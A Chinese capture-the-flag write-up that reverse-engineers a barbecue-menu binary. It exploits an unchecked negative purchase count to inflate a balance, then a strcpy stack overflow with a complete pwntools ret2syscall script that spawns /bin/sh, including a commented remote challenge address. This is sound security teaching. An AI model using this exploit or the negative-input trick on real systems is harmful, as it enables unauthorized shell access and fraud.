程序分析:

main

函数比较多,直接搜索 main 函数:目前看起来是比较正常的菜单题

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
int __fastcall main(int argc, const char **argv, const char **envp)
{
    int v3; // edx
    int v4; // ecx
    int v5; // r8d
    int v6; // r9d

    welcome(argc, argv, envp);
    while ( 1 )
    {
        switch ( (unsigned int)menu() )
        {
            case 1u:
                pijiu();
                break;
            case 2u:
                chuan();
                break;
            case 3u:
                yue();
                break;
            case 4u:
                vip();
                break;
            case 5u:
                if ( own )
                    gaiming();
                break;
            default:
                _printf((unsigned int)&unk_4B7008, (_DWORD)argv, v3, v4, v5, v6);  // 吃好了?下次还来哈~  
                exit(0);
        }
    }
}

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
__int64 __fastcall menu(__int64 a1, __int64 a2, int a3, int a4, int a5, int a6)
{
    int v6; // edx
    int v7; // ecx
    int v8; // r8d
    int v9; // r9d
    unsigned int v11; // [rsp+Ch] [rbp-4h] BYREF

    _printf((unsigned int)&unk_4B7040, (unsigned int)&name, a3, a4, a5, a6);
    IO_puts(&unk_4B706B);     // 1. 啤酒
    IO_puts(&unk_4B7075);     // 2. 烤串
    IO_puts(&unk_4B707F);     // 3. 钱包余额
    IO_puts(&unk_4B708F);     // 4. 承包摊位
    if ( own )
        IO_puts(&unk_4B709F);
    IO_puts(&unk_4B70A9);     // 0.离开
    putchar('>');
    putchar(' ');
    _isoc99_scanf((unsigned int)&unk_4B70B3, (unsigned int)&v11, v6, v7, v8, v9);
    return v11;
}

运行一下程序,寻找对应参数表示的字符串:

pijiu

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
__int64 pijiu()
{
    int v0; // edx
    int v1; // ecx
    int v2; // r8d
    int v3; // r9d
    int v4; // edx
    int v5; // ecx
    int v6; // r8d
    int v7; // r9d
    int v9; // [rsp+8h] [rbp-8h] BYREF
    int v10; // [rsp+Ch] [rbp-4h] BYREF

    v10 = 1;
    v9 = 1;
    IO_puts((__int64)&unk_4B70B6);          // 1. 青岛啤酒
    IO_puts((__int64)&unk_4B70C6);          // 2. 燕京 U8
    IO_puts((__int64)&unk_4B70D2);          // 3. 勇闯天涯
    _isoc99_scanf((unsigned int)&unk_4B70B3, (unsigned int)&v10, v0, v1, v2, v3);
    IO_puts((__int64)&unk_4B70E2);          // 来几瓶?
    _isoc99_scanf((unsigned int)&unk_4B70B3, (unsigned int)&v9, v4, v5, v6, v7);
    if ( 10 * v9 >= money )
        IO_puts((__int64)&unk_4B70EF);
    else
        money += -10 * v9;
    IO_puts((__int64)&unk_4B7105);          // 咕噜咕噜
    return 0;
}

这里 v9 猜测是 count 数量,每种啤酒都是十元,下面的串也是,一串五元

chuan:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
__int64 chuan()
{
    int v0; // edx
    int v1; // ecx
    int v2; // r8d
    int v3; // r9d
    int v4; // edx
    int v5; // ecx
    int v6; // r8d
    int v7; // r9d
    int v9; // [rsp+8h] [rbp-8h] BYREF
    int v10; // [rsp+Ch] [rbp-4h] BYREF

    v10 = 1;
    v9 = 1;
    IO_puts((__int64)&unk_4B7115);     // 1. 羊肉串
    IO_puts((__int64)&unk_4B7122);     // 2. 牛肉串
    IO_puts((__int64)&unk_4B712F);     // 3. 鸡肉串
    _isoc99_scanf((unsigned int)&unk_4B70B3, (unsigned int)&v10, v0, v1, v2, v3);
    IO_puts((__int64)&unk_4B713C);     // 4. 来几串?
    _isoc99_scanf((unsigned int)&unk_4B70B3, (unsigned int)&v9, v4, v5, v6, v7);
    if ( 5 * v9 >= money )             
        IO_puts((__int64)&unk_4B70EF);
    else
        money -= 5 * v9;
    return 0;
}

yue:

1
2
3
4
5
__int64 __fastcall yue(__int64 a1, __int64 a2, int a3, int a4, int a5, int a6)
{
    _printf((unsigned int)&unk_4B7150, money, a3, a4, a5, a6);
    return 0;
}

打印出来剩余的余额,一开始有 233 元

vip:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
__int64 vip()
{
  IO_puts((__int64)&unk_4B7180); 
  if ( money <= 100000 )
  {
    IO_puts((__int64)&unk_4B71A9);
  }
  else
  {
    money -= 100000;
    own = 1;
    IO_puts((__int64)&unk_4B71A2);
  }
  return 0;
}

当你想要承包摊位的时候会发现资金不够

gaming:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
/*
case 5u:
    if ( own )
        gaiming();
    break;
*/

__int64 gaiming()
{
    int v0; // edx
    int v1; // ecx
    int v2; // r8d
    int v3; // r9d
    _BYTE v5[32]; // [rsp+0h] [rbp-20h] BYREF

    IO_puts((__int64)&unk_4B71C0);              // 烧烤摊儿已归你所有,请赐名:
    _isoc99_scanf((unsigned int)&unk_4B71EB, (unsigned int)v5, v0, v1, v2, v3);
    j_strcpy(&name, v5);
    return 0;
}

可知除了荧幕上显示的 12340 五个选项外还有一个选项,但前提是能够有钱买下摊位,也就是 own > 1;

EXP 思路:

想了一段时间,但是并没有发现可疑且可疑控制的地方,后来突发奇想,余额是根据总金额- 10*v9来计算的,既然没有对 v9 进行校验,那么我们传入负数是不是就可以增大金额了呢?事实上确实是这样:

那么我们很快就可以创建我们的第一个摊位了:在这之后我们就可以进行选项 5 了

1
2
3
4
5
6
7
8
9
    IO_puts((__int64)&unk_4B71C0);              // 烧烤摊儿已归你所有,请赐名:
    _isoc99_scanf((unsigned int)&unk_4B71EB, (unsigned int)v5, v0, v1, v2, v3);
    j_strcpy(&name, v5);
/*
__int64 __fastcall j_strcpy()
{
  return strcpy();
}
*/

这样我们就可以利用 j_strcpy 函数了

我们发现 name 的地址是写死的,输入一段过长的数字也会造成栈溢出,不过 canary 并没有下在这里面:

因此执行栈溢出之后打一个 ret2syscall 就可以了,和我们之前文章里用的板子是一样的:

总 EXP:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
from pwn import *
elf = ELF("/home/kali/Desktop/kali_share/shaokao")
context.arch = "amd64"
p = process('/home/kali/Desktop/kali_share/shaokao')
context.terminal = ["tmux", "splitw", "-h"]
# p = remote('47.99.147.34',15420)

p.sendline(b'1')
p.sendline(b'1')
p.sendline(b'-9000000')
p.sendline(b'4')
p.sendline(b'5')

name_addr = 0x4E60F0
pop_rdi = 0x0040264f
pop_rsi = 0x40a67e
pop_rdx_rbx = 0x4a404b
pop_rax = 0x0458827
syscall = 0x0402404

payload = b'/bin/sh\x00' 
payload = payload.ljust(0x20,b'\x00') + p64(0) # rbp
payload += p64(pop_rdi)   # 1. 给rdi赋值:/bin/sh字符串地址(execve第一个参数)
payload += p64(name_addr)    
payload += p64(pop_rsi)   # 2. 给rsi赋值:0(execve第二个参数NULL)
payload += p64(0)
payload += p64(pop_rdx_rbx)   # 3. 给rdx赋值:0(execve第三个参数NULL)
payload += p64(0)
payload += p64(0)
payload += p64(pop_rax)   # 4. 给rax赋值:59(execve的系统调用号)
payload += p64(59)
payload += p64(syscall)   # 5. 触发syscall,执行execve("/bin/sh", NULL, NULL)

p.sendline(payload)
p.interactive()

说些什么吧!

utterances